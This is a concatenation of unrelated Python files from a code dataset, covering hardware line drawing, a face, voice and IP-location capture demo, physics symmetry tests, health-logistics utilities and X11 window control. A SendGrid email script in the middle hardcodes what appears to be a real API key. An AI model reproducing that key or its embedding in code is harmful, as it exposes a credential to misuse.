- 1)\n# x1 = random.randint(0, width - 1)\n# y0 = random.randint(0, height - 1)\n# y1 = random.randint(0, height - 1)\n# line(x0, y0, x1, y1, r, g, b)\n# pygame.display.flip()\n# sum += 1. / (time.time() - start)\n# print(sum / 1000)\n#\n#\n# def line(x0, y0, x1, y1, r, g, b):\n# dx = abs(x1 - x0)\n# dy = abs(y1 - y0)\n# sx = 1 if x0 < x1 else -1\n# sy = 1 if y0 < y1 else -1\n# err = (dx >> 1) if dx > dy else -(dy >> 1)\n#\n# while 1:\n# screen.set_at((x0, y0), (r, g, b))\n# # print \"(\" + str(x0) + \",\" + str(y0) + \"),(\" + str(x1) + \",\" + str(y1) + \")\"\n# if (x0 == x1) & (y0 == y1):\n# break\n# e2 = err\n# if e2 > -dx:\n# err -= dy\n# x0 += sx\n# if e2 < dy:\n# err += dx\n# y0 += sy\n\ndef line2(x0, y0, x1, y1):\n arr = [0] * 32\n result = [0] * 2\n dx = abs(x1 - x0)\n dy = abs(y1 - y0)\n\n if (x0 < x1):\n sx = 1;\n else:\n sx = -1;\n\n if (y0 < y1):\n sy = 1;\n else:\n sy = -1;\n\n if (dx > dy):\n err = (dx >> 1);\n else:\n err = -(dy >> 1);\n\n while (1):\n\n arr[y0 - 1] |= 1 << (x0 - 1);\n # print(\"{0:32b}\".format(arr[y0-1]))\n\n # print('x1:', x1, 'y1:', \"%d\" %(y1))\n if ((x0 == x1) & (y0 == y1)):\n break;\n\n e2 = err;\n if (e2 > -dx):\n err -= dy;\n x0 += sx;\n\n if (e2 < dy):\n err += dx;\n y0 += sy;\n\n # print('x0:', x0, 'y0:', \"%d\" %(y0))\n result[0] = x0\n result[1] = y0\n # for i in range(0 , 31):\n # # for j in range(0 , 31):\n # # print( ((arr[i]>>j)&1), ' ', end=\"\")\n # # print(bin(arr[i]))\n # print(\"{0:32b}\".format(arr[i]))\n # #print('')\n return result\n\n\nclass BresenhamUnitFL(Component):\n def construct(s, type):\n s.x0 = InPort(type)\n s.y0 = InPort(type)\n s.x1 = InPort(type)\n s.y1 = InPort(type)\n s.output_x = OutPort(type)\n s.output_y = OutPort(type)\n\n @s.update\n def calc():\n x0 = s.x0\n y0 = s.y0\n x1 = s.x1\n y1 = s.y1\n dx = abs(x1 - x0)\n dy = abs(y1 - y0)\n\n if (x0 < x1):\n sx = 1;\n else:\n sx = -1;\n\n if (y0 < y1):\n sy = 1;\n else:\n sy = -1;\n\n if (dx > dy):\n err = (dx >> 1);\n else:\n err = -(dy >> 1);\n\n while (1):\n # print('x0:', x0, 'y0:', \"%d\" % (y0))\n s.output_x = x0\n s.output_y = y0\n if ((x0 == x1) & (y0 == y1)):\n break;\n e2 = err;\n if (e2 > -dx):\n err -= dy;\n x0 += sx;\n if (e2 < dy):\n err += dx;\n y0 += sy;\n\nclass BresenhamUnitRTL(Component):\n def construct(s, type):\n s.trigger = InPort(b1)\n s.x0 = InPort(type)\n s.y0 = InPort(type)\n s.x1 = InPort(type)\n s.y1 = InPort(type)\n s.valid = OutPort(b1)\n s.output_x = OutPort(type)\n s.output_y = OutPort(type)\n\n s.state = Wire(b2)\n s.S0 = b3(0)\n s.S1 = b3(1)\n s.S2 = b3(2)\n s.S3 = b3(3)\n s.nextState = Wire(b2)\n\n s.w_x0 = Wire(type)\n s.w_y0 = Wire(type)\n s.w_x1 = Wire(type)\n s.w_y1 = Wire(type)\n\n s.w_valid = Wire(b1)\n\n s.w_dx = Wire(type)\n s.w_dy = Wire(type)\n\n s.w_sx = Wire(type)\n s.w_sy = Wire(type)\n\n s.w_err = Wire(type)\n s.w_e2 = Wire(type)\n\n @s.update\n def update():\n\n if s.reset:\n s.state = s.S0\n s.w_valid = b1(0)\n s.w_x0 = type(0)\n s.w_y0 = type(0)\n s.w_x1 = type(0)\n s.w_y1 = type(0)\n s.w_dx = type(0)\n s.w_dy = type(0)\n else:\n s.state = s.nextState\n\n if s.state == s.S0:\n if s.trigger: #assign initial values\n s.w_valid = b1(0)\n s.w_x0 = s.x0\n s.w_y0 = s.y0\n s.w_x1 = s.x1\n s.w_y1 = s.y1\n s.w_dx = s.x1 - s.x0\n s.w_dy = s.y1 - s.y0\n s.nextState = s.S1\n else:\n s.nextState = s.S0\n\n # \"The less than and greater than operators always treat the operands as un-signed\"\n # www.csl.cornell.edu/courses/ece4750/handouts/ece4750-tut3-pymtl.pdf page 9\n elif s.state == s.S1:\n if s.w_dx[5] == 0: # if dx >= 0 (i don't know how to parametrize that part)\n s.w_sx = type(1)\n else:\n s.w_dx = 0 - s.w_dx # else abs(dx)\n s.w_sx = type(-1)\n if s.w_dy[5] == 0: # if dy >= 0\n s.w_sy = type(1)\n else:\n s.w_dy = 0 - s.w_dy # else abs(dy)\n s.w_sy = type(-1)\n s.nextState = s.S2\n elif s.state == s.S2:\n if s.w_dx > s.w_dy: # both values >=0\n s.w_err = s.w_dx >> 1\n else:\n s.w_err = 0 - (s.w_dy >> 1) # err can have neg value\n s.nextState = s.S3\n elif s.state == s.S3:\n s.w_e2 = s.w_err\n if s.w_e2[5] == 0: # if e2 > 0\n # then we dont need to check if (e2 > -dx) - it is\n s.w_err -= s.w_dy # no problem with two's complement arithmetics\n s.w_x0 += s.w_sx\n if (s.w_e2 < s.w_dy): # no problem with this comparison - e2 always >= 0\n s.w_err += s.w_dx\n s.w_y0 += s.w_sy\n else: # here we know that e2 < 0 and (0 - dx) < 0\n if s.w_e2 > (0-s.w_dx): # and we can compare two \"negative\" vals normal way\n s.w_err -= s.w_dy\n s.w_x0 += s.w_sx\n # here we know that e2 < 0 and dy > 0\n s.w_err += s.w_dx # then we dont need to check if (e2 < dy) - it is\n s.w_y0 += s.w_sy\n if (s.w_x0 == s.w_x1) & (s.w_y0 == s.w_y1): #check if algorithm has finished\n s.w_valid = b1(1)\n s.nextState = s.S0\n else:\n s.nextState = s.S3\n\n s.output_x = s.w_x0\n s.output_y = s.w_y0\n s.valid = s.w_valid\n\ndef test_fl():\n model = BresenhamUnitFL(b6)\n model.elaborate()\n sim = model.apply(SimpleSim)\n for i in range(1, 100):\n model.reset()\n randA = random.randint(1, 32)\n randB = random.randint(1, 32)\n randC = random.randint(1, 32)\n randD = random.randint(1, 32)\n model.x0 = randA\n model.y0 = randB\n model.x1 = randC\n model.y1 = randD\n print('x0:', randA, 'y0:', randB, 'x1:', randC, 'y1:', randD)\n model.tick()\n print('output_x: ', model.output_x)\n print('output_y: ', model.output_y)\n print(\"\")\n result = line2(randA, randB, randC, randD)\n assert model.output_x == result[0]\n assert model.output_y == result[1]\n\n\ndef test_rtl():\n\n dut = BresenhamUnitRTL(b6)\n dut.elaborate()\n\n dut.yosis_translate_import = True\n dut = TranslationImportPass()(dut)\n\n # Create a simulator\n dut.dump_vcd = True\n dut.vcd_file_name = \"Bresenham\"\n dut.elaborate()\n dut.apply(SimulationPass)\n dut.sim_reset()\n for i in range(1, 100):\n\n randA = random.randint(1, 32)\n randB = random.randint(1, 32)\n randC = random.randint(1, 32)\n randD = random.randint(1, 32)\n\n dut.x0 = b6(randA)\n dut.y0 = b6(randB)\n dut.x1 = b6(randC)\n dut.y1 = b6(randD)\n print('x0:', randA, 'y0:', randB, 'x1:', randC, 'y1:', randD)\n dut.tick()\n dut.trigger = b1(1)\n dut.tick()\n dut.trigger_i = b1(0)\n while dut.valid == b1(0):\n dut.tick()\n print('output_x: ', \"%d\" % (dut.output_x))\n print('output_y: ', \"%d\" % (dut.output_y))\n print('')\n result = line2(randA, randB, randC, randD)\n assert dut.output_x == result[0]\n assert dut.output_y == result[1]\n\n\n# random_lines()\n# pygame.quit()\n\ntest_fl()\ntest_rtl()\n","repo_name":"Hugo-L3174/Advanced_System-on-chip_Design","sub_path":"pyMTL/bresenham.py","file_name":"bresenham.py","file_ext":"py","file_size_in_byte":9475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37997807818","text":"import json\nimport time\nimport uuid\n\nimport cv2\nimport face_recognition as fr\nimport speech_recognition as sr\nimport imageio\nimport requests\n\nrecog = sr.Recognizer()\n\n# Record from microphone\nwith sr.Microphone() as microphone:\n print('Adjusting for ambient noise')\n recog.adjust_for_ambient_noise(microphone)\n print('Please say something now...')\n from_timestamp = int(time.time())\n audio = recog.listen(microphone)\n to_timestamp = int(time.time())\n spoken = recog.recognize_google(audio, language='EN-us')\n print('Audio capture complete')\n\n# Record from camera\nprint(\"Initialising camera\")\ncam = cv2.VideoCapture(0)\nprint('Please look into the camera...')\nfor i in range(3,0,-1):\n print(i)\n time.sleep(1)\nret, frame = cam.read()\n\nprint('Image capture complete')\nprint('Resizing image')\nsmall_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\nprint('Converting the image from BGR color (OpenCV) to RGB color (face_recognition)')\nrgb_small_frame = small_frame[:, :, ::-1]\nprint('Detecting faces')\nface_locations = fr.face_locations(rgb_small_frame)\nface_encodings = fr.face_encodings(rgb_small_frame, face_locations)\n\nprint('Detecting location from IP')\nresp = requests.get('https://ipinfo.io')\nif resp.status_code == 200:\n print('Location detected')\n network_loc = resp.json()\nelse:\n network_loc = None\n print('Warning: device not online')\n\nprint('Storing information on disk')\nimageio.imwrite('capture_peripheral.jpg', frame)\n\ncaptures = []\n\nif spoken:\n capture = {\n 'id': str(uuid.uuid4()),\n 'type': 'poplesia/types/audio_capture',\n 'timestamp': from_timestamp,\n 'agent': {\n 'id': str(uuid.uuid4()),\n 'type': 'microphone',\n 'spec': 'MacBook Pro (15-inch, 2017)',\n 'location': network_loc\n },\n 'text': spoken\n }\n captures.append(capture)\n\nfor face_encoding in face_encodings:\n capture = {\n 'id': str(uuid.uuid4()),\n 'type': 'poplesia/types/face_capture',\n 'timestamp': from_timestamp,\n 'agent': {\n 'type': 'camera',\n 'id': str(uuid.uuid4()),\n 'location': network_loc,\n },\n 'face_encoding_128': face_encoding.tolist()\n }\n captures.append(capture)\n\nwith open('capture_peripheral.json', 'w') as capture_file:\n for capture in captures:\n capture_file.write(f'{json.dumps(capture)}\\n')\nprint('Wrote capture to disk')\n\nprint()\nprint('Summary:')\nprint(f'- Speech detected: {spoken}')\nprint(f'- Faces detected: {len(face_encodings)}')\nprint(f'- Location detected: {network_loc is not None}')\n","repo_name":"skipperkongen/poplesia","sub_path":"demos/peripheral_demo.py","file_name":"peripheral_demo.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41403974588","text":"from graph import CityNetwork\nimport const\nfrom copy import deepcopy\n\n\ncityNetKm = CityNetwork(const.DISTANCES)\na,b = cityNetKm.findShortestPathBetweenAllSelectedLocations(['roma', 'milano', 'torino'])\nprint(a, b)\nc,d = cityNetKm.findAlternative(a)\nprint(c, d)\n\nc,d = cityNetKm.findAlternativeAB(a, 'roma', 'torino')\nprint(c, d)","repo_name":"paolaguarasci/game","sub_path":"src/v3/calculateSimplePath.py","file_name":"calculateSimplePath.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19023841790","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport cellconstructor as CC\nimport cellconstructor.Structure\nimport cellconstructor.Phonons\nimport cellconstructor.symmetries\n\ntry:\n import spglib\nexcept:\n raise ValueError(\"Error, to run this example you need to install spglib\")\n \n \n\"\"\"\nThis code loads a dynamical matrix with the structure that barely \nsatisfy a C2/c monoclinic group (with a 0.04 threshold) and\nconstrain the symmetries to allow programs like quantum espresso\nto detect symmetries correctly.\n\n\nNOTE: To recognize symmetries this example uses spglib.\n\"\"\"\n\nimport sys, os\n\ndef test_impose_symmetry():\n total_path = os.path.dirname(os.path.abspath(__file__))\n os.chdir(total_path)\n\n\n # initialize the dynamical matrix\n dyn = CC.Phonons.Phonons(\"old_dyn\", full_name=True)\n\n # Print the symmetry group at high threshold\n GROUP = spglib.get_spacegroup(dyn.structure.get_ase_atoms(), 0.05)\n s_group_expected = spglib.get_spacegroup(dyn.structure.get_ase_atoms())\n print (\"Space group with high threshold:\", s_group_expected)\n print (\"Space group with low threshold:\", GROUP)\n\n # Get the symmetries from the new spacegroup\n symmetries = spglib.get_symmetry(dyn.structure.get_ase_atoms(), symprec = 0.05)\n print(\"Number of symmetries: {}\".format(len(symmetries[\"rotations\"])))\n\n # Transform the spglib symmetries into the CellConstructor data type\n sym_mats = CC.symmetries.GetSymmetriesFromSPGLIB(symmetries, True)\n # Force the symmetrization\n dyn.structure.impose_symmetries(sym_mats)\n\n # Check once again the symetry\n s_group_after = spglib.get_spacegroup(dyn.structure.get_ase_atoms())\n print (\"New space group with high threshold:\", s_group_after)\n\n assert s_group_after == GROUP\n\n\nif __name__ == \"__main__\":\n test_impose_symmetry()\n","repo_name":"SSCHAcode/CellConstructor","sub_path":"tests/TestImposeSymmetries/test_impose_symmetries.py","file_name":"test_impose_symmetries.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"72673060533","text":"\"\"\"Retrieve and print words form a URL\n\nReturns:\n [type]: [description]\n\"\"\"\n\nimport sys\nfrom urllib.request import urlopen\n\n\ndef fetch_words(url):\n story = urlopen(url)\n story_words = []\n for line in story:\n line_words = line.decode('utf-8').split()\n for word in line_words:\n story_words.append(word)\n story.close()\n return story_words\n\n\ndef print_items(items):\n \"\"\"[summary]\n\n Args:\n items ([type]): [description]\n \"\"\" \n for item in items:\n print(item)\n \n \ndef main(url):\n \"\"\"[summary]\n\n Args:\n url ([type]): [description]\n \"\"\" \n words = fetch_words(url)\n print_items(words)\n \n \nif __name__ == '__main__' :\n main(sys.argv[1])\n","repo_name":"csreehari/corepy","sub_path":"words.py","file_name":"words.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11854660835","text":"import os\nfrom sendgrid import SendGridAPIClient\nfrom sendgrid.helpers.mail import Mail\n\nmessage = Mail(\n from_email='contact@scl-solution.com',\n to_emails='web.clabots@gmail.com',\n subject='SCL - Merci pour votre email !',\n html_content='<strong>This is a test from python !!</strong>')\ntry:\n sg = SendGridAPIClient('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')\n response = sg.send(message)\n print(response.status_code)\n print(response.body)\n print(response.headers)\nexcept Exception as e:\n print(e.message)","repo_name":"SimClb/scl","sub_path":"sclWebsite/mailsending.py","file_name":"mailsending.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32849570151","text":"from xml.etree import ElementTree\nfrom dimagi.utils.couch.database import get_db\nfrom casexml.apps.case.models import CommCareCase\nfrom corehq.apps.commtrack import const\nfrom corehq.apps.commtrack.models import (\n CommtrackConfig, CommtrackActionConfig, LocationType, RequisitionActions,\n CommtrackRequisitionConfig, Product, SupplyPointCase, RequisitionCase, Program\n)\nfrom corehq.apps.locations.models import Location\nimport itertools\nfrom datetime import datetime, date, timedelta\nfrom calendar import monthrange\nimport math\nimport bisect\nfrom corehq.apps.hqcase.utils import submit_case_blocks\nfrom casexml.apps.case.mock import CaseBlock\nfrom casexml.apps.case.xml import V2\n\n\ndef all_supply_point_types(domain):\n return [e['key'][1] for e in get_db().view('commtrack/supply_point_types', startkey=[domain], endkey=[domain, {}], group_level=2)]\n\ndef supply_point_type_categories(domain):\n config = CommtrackConfig.for_domain(domain)\n categories = config.supply_point_categories\n other_types = set(all_supply_point_types(domain)) - set(config.known_supply_point_types)\n categories['_oth'] = list(other_types)\n return categories\n\ndef all_sms_codes(domain):\n config = CommtrackConfig.for_domain(domain)\n\n actions = dict((action.keyword, action) for action in config.actions)\n products = dict((p.code, p) for p in Product.by_domain(domain))\n commands = {\n config.multiaction_keyword: {'type': 'stock_report_generic', 'caption': 'Stock Report'},\n }\n\n sms_codes = zip(('action', 'product', 'command'), (actions, products, commands))\n return dict(itertools.chain(*([(k.lower(), (type, v)) for k, v in codes.iteritems()] for type, codes in sms_codes)))\n\ndef get_supply_point(domain, site_code=None, loc=None):\n if loc is None:\n loc = Location.view('commtrack/locations_by_code',\n key=[domain, site_code.lower()],\n include_docs=True).first()\n if loc:\n case = SupplyPointCase.get_by_location(loc)\n else:\n case = None\n\n return {\n 'case': case,\n 'location': loc,\n }\n\ndef make_product(domain, name, code, program_id):\n p = Product()\n p.domain = domain\n p.name = name\n p.code = code.lower()\n p.program_id = program_id\n p.save()\n return p\n\ndef make_program(domain, name, code):\n p = Program()\n p.domain = domain\n p.name = name\n p.code = code.lower()\n p.save()\n return p\n\ndef get_or_make_def_program(domain):\n program = [p for p in Program.by_domain(domain) if p.name == \"Default\"]\n if len(program) == 0:\n return make_program(domain, 'Default', 'def')\n else:\n return program[0]\n\n\ndef bootstrap_commtrack_settings_if_necessary(domain, requisitions_enabled=False):\n if not(domain and domain.commtrack_enabled and not domain.commtrack_settings):\n return\n\n c = CommtrackConfig(\n domain=domain.name,\n multiaction_enabled=True,\n multiaction_keyword='report',\n actions=[\n CommtrackActionConfig(\n action='receipts',\n keyword='r',\n caption='Received',\n ),\n CommtrackActionConfig(\n action='consumption',\n keyword='c',\n caption='Consumed',\n ),\n CommtrackActionConfig(\n action='consumption',\n subaction='loss',\n keyword='l',\n caption='Losses',\n ),\n CommtrackActionConfig(\n action='stockonhand',\n keyword='soh',\n caption='Stock on hand',\n ),\n CommtrackActionConfig(\n action='stockout',\n keyword='so',\n caption='Stock-out',\n ),\n ],\n location_types=[\n LocationType(name='state', allowed_parents=[''], administrative=True),\n LocationType(name='district', allowed_parents=['state'], administrative=True),\n LocationType(name='block', allowed_parents=['district'], administrative=True),\n LocationType(name='village', allowed_parents=['block'], administrative=True),\n LocationType(name='outlet', allowed_parents=['block', 'village']),\n ],\n supply_point_types=[],\n )\n if requisitions_enabled:\n c.requisition_config = get_default_requisition_config()\n\n c.save()\n\n program = make_program(domain.name, 'Default', 'def')\n make_product(domain.name, 'Sample Product 1', 'pp', program.get_id)\n make_product(domain.name, 'Sample Product 2', 'pq', program.get_id)\n make_product(domain.name, 'Sample Product 3', 'pr', program.get_id)\n\n return c\n\ndef get_default_requisition_config():\n return CommtrackRequisitionConfig(\n enabled=True,\n actions=[\n CommtrackActionConfig(\n action=RequisitionActions.REQUEST,\n keyword='req',\n caption='Request',\n ),\n CommtrackActionConfig(\n action=RequisitionActions.APPROVAL,\n keyword='approve',\n caption='Approved',\n ),\n CommtrackActionConfig(\n action=RequisitionActions.PACK,\n keyword='pack',\n caption='Packed',\n ),\n CommtrackActionConfig(\n action=RequisitionActions.RECEIPTS,\n keyword='rec',\n caption='Requisition Receipts',\n ),\n ],\n )\n\ndef due_date_weekly(dow, past_period=0): # 0 == sunday\n \"\"\"compute the next due date on a weekly schedule, where reports are\n due on 'dow' day of the week (0:sunday, 6:saturday). 'next' due date\n is the first due date that occurs today or in the future. if past_period\n is non-zero, return the due date that occured N before the next due date\n \"\"\"\n cur_weekday = date.today().isoweekday()\n days_till_due = (dow - cur_weekday) % 7\n return date.today() + timedelta(days=days_till_due - 7 * past_period)\n\ndef due_date_monthly(day, from_end=False, past_period=0):\n \"\"\"compute the next due date on a monthly schedule, where reports are\n due on 'day' day of the month. (if from_end is true, due date is 'day' days\n before the end of the month, where 0 is the last day of the month). 'next' due date\n is the first due date that occurs today or in the future. if past_period\n is non-zero, return the due date that occured N before the next due date\n \"\"\"\n if from_end:\n assert False, 'not supported yet'\n\n month_diff = -past_period\n if date.today().day > day:\n month_diff += 1\n month_seq = date.today().year * 12 + (date.today().month - 1)\n month_seq += month_diff\n\n y = month_seq // 12\n m = month_seq % 12 + 1\n return date(y, m, min(day, monthrange(y, m)[1]))\n\ndef num_periods_late(product_case, schedule, *schedule_args):\n last_reported = datetime.strptime(getattr(product_case, 'last_reported', '2000-01-01')[:10], '%Y-%m-%d').date()\n\n class DueDateStream(object):\n \"\"\"mimic an array of due dates to perform a binary search\"\"\"\n\n def __getitem__(self, i):\n return self.normalize(self.due_date(i + 1))\n\n def __len__(self):\n \"\"\"highest number of periods late before we stop caring\"\"\"\n max_horizon = 30. * 365.2425 / self.period_length() # arbitrary upper limit -- 30 years\n return math.ceil(max_horizon)\n\n def due_date(self, n):\n return {\n 'weekly': due_date_weekly,\n 'monthly': due_date_monthly,\n }[schedule](*schedule_args, past_period=n)\n\n def period_length(self, n=100):\n \"\"\"get average length of reporting period\"\"\"\n return (self.due_date(0) - self.due_date(n)).days / float(n)\n\n def normalize(self, dt):\n \"\"\"convert dates into a numerical scale (where greater == more in the past)\"\"\"\n return -(dt - date(2000, 1, 1)).days\n\n stream = DueDateStream()\n # find the earliest due date that is on or after the most-recent report date,\n # and return how many reporting periods back it occurs\n return bisect.bisect_right(stream, stream.normalize(last_reported))\n\ndef submit_mapping_case_block(user, index):\n mapping = user.get_location_map_case()\n\n if mapping:\n caseblock = CaseBlock(\n create=False,\n case_id=mapping._id,\n version=V2,\n index=index\n )\n else:\n caseblock = CaseBlock(\n create=True,\n case_type=const.USER_LOCATION_OWNER_MAP_TYPE,\n case_id=location_map_case_id(user),\n version=V2,\n owner_id=user._id,\n index=index\n )\n\n submit_case_blocks(\n ElementTree.tostring(caseblock.as_xml()),\n user.domain,\n user.username,\n user._id\n )\n\n\ndef location_map_case_id(user):\n return 'user-owner-mapping-' + user._id\n\n\ndef is_commtrack_location(user, domain):\n return True if user and user.location_id and domain.commtrack_enabled else False\n\n\ndef get_case_wrapper(data):\n return {\n const.SUPPLY_POINT_CASE_TYPE: SupplyPointCase,\n const.REQUISITION_CASE_TYPE: RequisitionCase,\n }.get(data.get('type'), CommCareCase)\n\n\ndef wrap_commtrack_case(case_json):\n return get_case_wrapper(case_json).wrap(case_json)\n","repo_name":"gmimano/commcaretest","sub_path":"corehq/apps/commtrack/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":9427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24486583593","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\"\"\"\nNotes:\n # https://stackoverflow.com/questions/51070465/is-it-possible-to-get-the-directory-of-a-specific-nautilus-window-in-a-script?noredirect=1#comment95427874_51070465\n sudo apt install python-nautilus\n mkdir -p ~/.local/share/nautilus-python/extensions\n\"\"\"\nimport ubelt as ub\nimport time\nimport six\nimport re\nimport pipes\nimport logging\nfrom vimtk import cplat\n\nlogger = logging.getLogger(__name__)\n\n\ndef is_directory_open(dpath):\n # FIXME\n import ubelt as ub # pip install me! https://github.com/Erotemic/ubelt\n import platform\n from os.path import basename\n import re\n computer_name = platform.node()\n dname = basename(dpath)\n if not ub.find_exe('wmctrl'):\n raise Exception('wmctrl must be installed')\n\n for line in ub.cmd('wmctrl -lxp')['out'].splitlines():\n parts = re.split(' +', line)\n if len(parts) > 3 and parts[3] == 'nautilus.Nautilus':\n if parts[4] == computer_name:\n # FIXME: Might be a False positive!\n line_dname = ' '.join(parts[5:])\n if line_dname == dname:\n return True\n # Always correctly returns False\n return False\n\n\ndef wmctrl_list():\n lines = ub.cmd('wmctrl -lxp')['out']\n windows = {}\n for line in lines.split('\\n'):\n if line:\n parts = re.split(' +', line)\n hexid, deskid, pid, wm_class, client = parts[0:5]\n title = ' '.join(parts[5:])\n wm_id = int(hexid, 16)\n windows[wm_id] = {\n 'hexid': hexid,\n 'wm_id': wm_id,\n 'deskid': deskid,\n 'pid': int(pid),\n 'wm_class': wm_class,\n 'client': client,\n 'title': title,\n }\n return windows\n\n\ndef windows_in_order():\n \"\"\"\n CommandLine:\n python -m vimtk.xctrl windows_in_order\n\n References:\n https://stackoverflow.com/questions/15638885/linux-how-to-get-a-list-of-all-visible-windows\n\n Example:\n >>> # xdoctest: +REQUIRES(env:DISPLAY)\n >>> from vimtk.xctrl import *\n >>> result = list(windows_in_order())\n >>> for win in result:\n ... if win.visible():\n ... print(win)\n\n Ignore:\n # Why is this slow somtimes?\n import subprocess\n subprocess.call(['xprop', '-root'])\n\n proc = subprocess.Popen(['xprop', '-root'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, bufsize=1, text=True)\n out, err = proc.communicate()\n\n proc = subprocess.Popen('xprop -root', shell=True, stdout=subprocess.PIPE, bufsize=1)\n info = ub.cmd('xprop -root | grep \"^_NET_CLIENT_LIST_STACKING\"', shell=True)\n info = ub.cmd('xprop -root _NET_CLIENT_LIST_STACKING', shell=True)\n\n info = ub.cmd('xprop -root _NET_CLIENT_LIST_STACKING')\n\n # I don't understand why this can be fast sometimes and slow others\n\n import subprocess\n import timerit\n import itertools as it\n import ubelt as ub\n options = {\n 'bufsize': [-1, 0],\n 'shell': [True, False],\n 'stdout': [subprocess.PIPE, None],\n 'stderr': [subprocess.PIPE, None],\n 'stdin': [subprocess.PIPE, None],\n 'universal_newlines': [True, False],\n # 'cwd': [None, '.']\n # 'env': [None, {}]\n }\n ti = timerit.Timerit(3, bestof=1, verbose=3)\n for vals in it.product(*options.values()):\n opt = ub.dzip(options.keys(), vals)\n command = ['xprop', '-root', '_NET_CLIENT_LIST_STACKING']\n name = ub.repr2(opt, explicit=True, nobr=1, nl=0, itemsep='')\n if opt['shell']:\n command = ' '.join(command)\n for timer in ti.reset(name):\n with timer:\n proc = subprocess.Popen(command, **opt)\n out, err = proc.communicate()\n assert proc.returncode == 0\n # print(out)\n\n for timer in ti.reset('ubelt'):\n with timer:\n print(ub.cmd('xprop -root _NET_CLIENT_LIST_STACKING')['out'])\n\n print(ub.repr2(ub.sorted_vals(ti.measures['mean']), nl=1, precision=6))\n proc = subprocess.Popen('xprop -root', shell=True, stdout=subprocess.PIPE, bufsize=0)\n out, err = proc.communicate()\n info = ub.cmd('xprop -root', verbose=3, shell=True)\n ub.cmd('wmctrl -lxp')['out']\n os.system('wmctrl -lxp')\n \"\"\"\n # info = XCtrl.cmd('xprop -root')\n info = XCtrl.cmd('xprop -root _NET_CLIENT_LIST_STACKING')\n\n lines = [line for line in info['out'].split('\\n')\n if line.startswith('_NET_CLIENT_LIST_STACKING')]\n assert len(lines) == 1, str(lines)\n winid_order_str = lines[0]\n winid_order = winid_order_str.split('#')[1].strip().split(', ')[::-1]\n winid_order = [int(h, 16) for h in winid_order]\n\n windows = wmctrl_list()\n\n for wm_id in winid_order:\n info = windows[wm_id]\n yield XWindow(wm_id, info)\n\n\ndef find_windows(proc=None, title=None, visible=True):\n \"\"\"\n CommandLine:\n python -m vimtk.xctrl find_windows\n\n Example:\n >>> # xdoctest: +REQUIRES(env:DISPLAY)\n >>> from vimtk.xctrl import * # NOQA\n >>> for win in find_windows('gvim'):\n >>> print(ub.repr2(win.info()))\n >>> for win in find_windows('terminator'):\n >>> print(ub.repr2(win.info()))\n \"\"\"\n import re\n for win in windows_in_order():\n flag = True\n if proc:\n try:\n proc_name = win.process_name()\n flag &= bool(re.match(proc, proc_name))\n except Exception:\n flag = False\n if title:\n try:\n win_title = win.title()\n flag &= bool(re.match(title, win_title))\n except Exception:\n flag = False\n if visible:\n try:\n flag &= win.visible()\n except Exception:\n flag = False\n if flag:\n yield win\n\n\nclass XWindow(ub.NiceRepr):\n \"\"\"\n TODO: make API consistent with the win32 version\n \"\"\"\n\n def __init__(self, wm_id, info=None, sleeptime=0.01):\n self.wm_id = wm_id\n self.cache = info\n self.sleeptime = 0.01\n\n @classmethod\n def find(XWindow, pattern, method='mru'):\n wm_id = XCtrl.find_window_id(pattern, method=method)\n self = XWindow(wm_id)\n return self\n\n @classmethod\n def current(XWindow):\n r\"\"\"\n CommandLine:\n VIMTK_TEST=1 xdoctest -m vimtk.xctrl XWindow.current\n\n Example:\n >>> # xdoctest: +REQUIRES(env:VIMTK_TEST)\n >>> from vimtk.xctrl import * # NOQA\n >>> self = XWindow.current()\n >>> print('self: XWindow = {}'.format(ub.urepr(self, nl=1)))\n >>> print('info = ' + ub.repr2(self.wininfo()))\n \"\"\"\n wm_id = int(ub.cmd('xdotool getwindowfocus')['out'].strip())\n win = XWindow(wm_id)\n return win\n\n def _wmquery(self, key):\n if self.cache:\n return self.cache[key]\n windows = wmctrl_list()\n info = windows[self.wm_id]\n self.cache = info\n return info['title']\n\n @property\n def hexid(self):\n return hex(self.wm_id)\n\n def title(self):\n self._wmquery('title')\n\n def visible(self):\n \"\"\" Basically true for wmctrl (afaik) \"\"\"\n return True\n\n def __nice__(self):\n try:\n fname = self.process_name()\n except Exception:\n fname = '<error: unable to get process name>'\n return str(self.wm_id) + ' ' + fname + ' ' + repr(self.title())\n\n def wm_class(self):\n return self._wmquery('wm_class')\n\n def process(self):\n import psutil\n pid = self._wmquery('pid')\n proc = psutil.Process(pid)\n return proc\n\n def size(self):\n # Get the current size\n info = self.wininfo()\n w, h = int(info['Width']), int(info['Height'])\n dsize = (w, h)\n return dsize\n\n def resize(self, width, height):\n \"\"\"\n\n CommandLine:\n VIMTK_TEST=1 xdoctest -m vimtk.xctrl XWindow.resize\n\n Example:\n >>> # xdoctest: +REQUIRES(env:VIMTK_TEST)\n >>> from vimtk.xctrl import * # NOQA\n >>> self = XWindow.current()\n >>> w, h = self.size()\n >>> self.resize(w + 10, h + 10)\n \"\"\"\n command = f'xdotool windowsize {self.wm_id} {width} {height}'\n ub.cmd(command, verbose=3)\n\n def wininfo(self):\n \"\"\"\n \"\"\"\n cmdinfo = ub.cmd('xwininfo -id {}'.format(self.wm_id))\n if cmdinfo['ret'] != 0:\n print('info = {}'.format(ub.urepr(cmdinfo, nl=1)))\n raise Exception(cmdinfo['ret'])\n out = cmdinfo['out']\n info = {}\n curr_key = None\n 